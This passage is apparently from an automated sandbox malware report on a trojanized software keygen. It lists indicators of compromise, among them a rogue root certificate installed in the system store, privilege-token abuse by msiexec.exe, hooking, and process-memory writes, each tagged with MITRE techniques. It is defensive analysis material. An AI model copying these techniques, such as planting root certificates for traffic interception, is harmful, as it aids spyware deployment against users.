Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 16087d21c5bdd601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	aliens.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	aliens.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868	D5F0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d5503000000010000001400000002faf3e291435468607857694df5e45b6885186820000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	D5F0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f03000000010000001400000002faf3e291435468607857694df5e45b688518681d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	D5F0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d5503000000010000001400000002faf3e291435468607857694df5e45b688518680400000001000000100000001d3554048578b03f42424dbf20730a3f20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	D5F0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 5c0000000100000004000000000800000400000001000000100000001d3554048578b03f42424dbf20730a3f03000000010000001400000002faf3e291435468607857694df5e45b688518681d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	D5F0.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
1220	PING.EXE
2560	PING.EXE
3584	PING.EXE
2096	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1396	1605715653158.exe
1396	1605715653158.exe
3488	1605715657408.exe
3488	1605715657408.exe
1268	1605715663049.exe
1268	1605715663049.exe
1308	jfiag3g_gg.exe
1308	jfiag3g_gg.exe
2860	1605715665799.exe
2860	1605715665799.exe
2480	1021C014A4C9A552.tmp
2480	1021C014A4C9A552.tmp
2464	seed.exe
2464	seed.exe
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found
2352	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
3540	MicrosoftEdgeCP.exe
2464	seed.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeManageVolumePrivilege	2116	jg2_2qua.exe
Token: SeManageVolumePrivilege	2116	jg2_2qua.exe
Token: SeShutdownPrivilege	1124	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1124	msiexec.exe
Token: SeSecurityPrivilege	1016	msiexec.exe
Token: SeCreateTokenPrivilege	1124	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1124	msiexec.exe
Token: SeLockMemoryPrivilege	1124	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1124	msiexec.exe
Token: SeMachineAccountPrivilege	1124	msiexec.exe
Token: SeTcbPrivilege	1124	msiexec.exe
Token: SeSecurityPrivilege	1124	msiexec.exe
Token: SeTakeOwnershipPrivilege	1124	msiexec.exe
Token: SeLoadDriverPrivilege	1124	msiexec.exe
Token: SeSystemProfilePrivilege	1124	msiexec.exe
Token: SeSystemtimePrivilege	1124	msiexec.exe
Token: SeProfSingleProcessPrivilege	1124	msiexec.exe
Token: SeIncBasePriorityPrivilege	1124	msiexec.exe
Token: SeCreatePagefilePrivilege	1124	msiexec.exe
Token: SeCreatePermanentPrivilege	1124	msiexec.exe
Token: SeBackupPrivilege	1124	msiexec.exe
Token: SeRestorePrivilege	1124	msiexec.exe
Token: SeShutdownPrivilege	1124	msiexec.exe
Token: SeDebugPrivilege	1124	msiexec.exe
Token: SeAuditPrivilege	1124	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1124	msiexec.exe
Token: SeChangeNotifyPrivilege	1124	msiexec.exe
Token: SeRemoteShutdownPrivilege	1124	msiexec.exe
Token: SeUndockPrivilege	1124	msiexec.exe
Token: SeSyncAgentPrivilege	1124	msiexec.exe
Token: SeEnableDelegationPrivilege	1124	msiexec.exe
Token: SeManageVolumePrivilege	1124	msiexec.exe
Token: SeImpersonatePrivilege	1124	msiexec.exe
Token: SeCreateGlobalPrivilege	1124	msiexec.exe
Token: SeCreateTokenPrivilege	1124	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1124	msiexec.exe
Token: SeLockMemoryPrivilege	1124	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1124	msiexec.exe
Token: SeMachineAccountPrivilege	1124	msiexec.exe
Token: SeTcbPrivilege	1124	msiexec.exe
Token: SeSecurityPrivilege	1124	msiexec.exe
Token: SeTakeOwnershipPrivilege	1124	msiexec.exe
Token: SeLoadDriverPrivilege	1124	msiexec.exe
Token: SeSystemProfilePrivilege	1124	msiexec.exe
Token: SeSystemtimePrivilege	1124	msiexec.exe
Token: SeProfSingleProcessPrivilege	1124	msiexec.exe
Token: SeIncBasePriorityPrivilege	1124	msiexec.exe
Token: SeCreatePagefilePrivilege	1124	msiexec.exe
Token: SeCreatePermanentPrivilege	1124	msiexec.exe
Token: SeBackupPrivilege	1124	msiexec.exe
Token: SeRestorePrivilege	1124	msiexec.exe
Token: SeShutdownPrivilege	1124	msiexec.exe
Token: SeDebugPrivilege	1124	msiexec.exe
Token: SeAuditPrivilege	1124	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1124	msiexec.exe
Token: SeChangeNotifyPrivilege	1124	msiexec.exe
Token: SeRemoteShutdownPrivilege	1124	msiexec.exe
Token: SeUndockPrivilege	1124	msiexec.exe
Token: SeSyncAgentPrivilege	1124	msiexec.exe
Token: SeEnableDelegationPrivilege	1124	msiexec.exe
Token: SeManageVolumePrivilege	1124	msiexec.exe
Token: SeImpersonatePrivilege	1124	msiexec.exe
Token: SeCreateGlobalPrivilege	1124	msiexec.exe
Token: SeCreateTokenPrivilege	1124	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1124	msiexec.exe
2480	1021C014A4C9A552.tmp

Suspicious use of SetWindowsHookEx 26 IoCs

pid	Process
700	002.exe
700	002.exe
3884	Setup.exe
2280	setup.exe
2944	aliens.exe
2328	0B44010BDDEFEFD3.exe
4040	0B44010BDDEFEFD3.exe
2840	firefox.exe
1396	1605715653158.exe
3276	firefox.exe
3488	1605715657408.exe
564	firefox.exe
1268	1605715663049.exe
992	firefox.exe
2860	1605715665799.exe
2552	ThunderFW.exe
3336	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2072	1021C014A4C9A552.exe
2480	1021C014A4C9A552.tmp
3568	seed.sfx.exe
304	MicrosoftEdge.exe
3540	MicrosoftEdgeCP.exe
3540	MicrosoftEdgeCP.exe
5040	EBDD.exe
5040	EBDD.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1144 wrote to memory of 1456	1144	Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe	78
PID 1144 wrote to memory of 1456	1144	Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe	78
PID 1144 wrote to memory of 1456	1144	Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe	78
PID 1456 wrote to memory of 2068	1456	cmd.exe	81
PID 1456 wrote to memory of 2068	1456	cmd.exe	81
PID 1456 wrote to memory of 2068	1456	cmd.exe	81
PID 1456 wrote to memory of 1768	1456	cmd.exe	82
PID 1456 wrote to memory of 1768	1456	cmd.exe	82
PID 1456 wrote to memory of 1768	1456	cmd.exe	82
PID 1456 wrote to memory of 3132	1456	cmd.exe	83
PID 1456 wrote to memory of 3132	1456	cmd.exe	83
PID 1456 wrote to memory of 3132	1456	cmd.exe	83
PID 1456 wrote to memory of 3928	1456	cmd.exe	84
PID 1456 wrote to memory of 3928	1456	cmd.exe	84
PID 1456 wrote to memory of 3928	1456	cmd.exe	84
PID 3928 wrote to memory of 3040	3928	keygen-step-3.exe	85
PID 3928 wrote to memory of 3040	3928	keygen-step-3.exe	85
PID 3928 wrote to memory of 3040	3928	keygen-step-3.exe	85
PID 1456 wrote to memory of 2076	1456	cmd.exe	87
PID 1456 wrote to memory of 2076	1456	cmd.exe	87
PID 1456 wrote to memory of 2076	1456	cmd.exe	87
PID 1768 wrote to memory of 2064	1768	keygen-pr.exe	88
PID 1768 wrote to memory of 2064	1768	keygen-pr.exe	88
PID 1768 wrote to memory of 2064	1768	keygen-pr.exe	88
PID 3040 wrote to memory of 2096	3040	cmd.exe	89
PID 3040 wrote to memory of 2096	3040	cmd.exe	89
PID 3040 wrote to memory of 2096	3040	cmd.exe	89
PID 2076 wrote to memory of 700	2076	keygen-step-4.exe	90
PID 2076 wrote to memory of 700	2076	keygen-step-4.exe	90
PID 2076 wrote to memory of 700	2076	keygen-step-4.exe	90
PID 2064 wrote to memory of 1572	2064	key.exe	91
PID 2064 wrote to memory of 1572	2064	key.exe	91
PID 2064 wrote to memory of 1572	2064	key.exe	91
PID 2076 wrote to memory of 3884	2076	keygen-step-4.exe	92
PID 2076 wrote to memory of 3884	2076	keygen-step-4.exe	92
PID 2076 wrote to memory of 3884	2076	keygen-step-4.exe	92
PID 3884 wrote to memory of 2280	3884	Setup.exe	93
PID 3884 wrote to memory of 2280	3884	Setup.exe	93
PID 3884 wrote to memory of 2280	3884	Setup.exe	93
PID 2280 wrote to memory of 2944	2280	setup.exe	94
PID 2280 wrote to memory of 2944	2280	setup.exe	94
PID 2280 wrote to memory of 2944	2280	setup.exe	94
PID 2076 wrote to memory of 2116	2076	keygen-step-4.exe	95
PID 2076 wrote to memory of 2116	2076	keygen-step-4.exe	95
PID 2076 wrote to memory of 2116	2076	keygen-step-4.exe	95
PID 2944 wrote to memory of 1124	2944	aliens.exe	96
PID 2944 wrote to memory of 1124	2944	aliens.exe	96
PID 2944 wrote to memory of 1124	2944	aliens.exe	96
PID 1016 wrote to memory of 2624	1016	msiexec.exe	98
PID 1016 wrote to memory of 2624	1016	msiexec.exe	98
PID 1016 wrote to memory of 2624	1016	msiexec.exe	98
PID 2076 wrote to memory of 1272	2076	keygen-step-4.exe	99
PID 2076 wrote to memory of 1272	2076	keygen-step-4.exe	99
PID 2076 wrote to memory of 1272	2076	keygen-step-4.exe	99
PID 2944 wrote to memory of 2328	2944	aliens.exe	100
PID 2944 wrote to memory of 2328	2944	aliens.exe	100
PID 2944 wrote to memory of 2328	2944	aliens.exe	100
PID 1272 wrote to memory of 2156	1272	askinstall21.exe	102
PID 1272 wrote to memory of 2156	1272	askinstall21.exe	102
PID 1272 wrote to memory of 2156	1272	askinstall21.exe	102
PID 2944 wrote to memory of 4040	2944	aliens.exe	101
PID 2944 wrote to memory of 4040	2944	aliens.exe	101
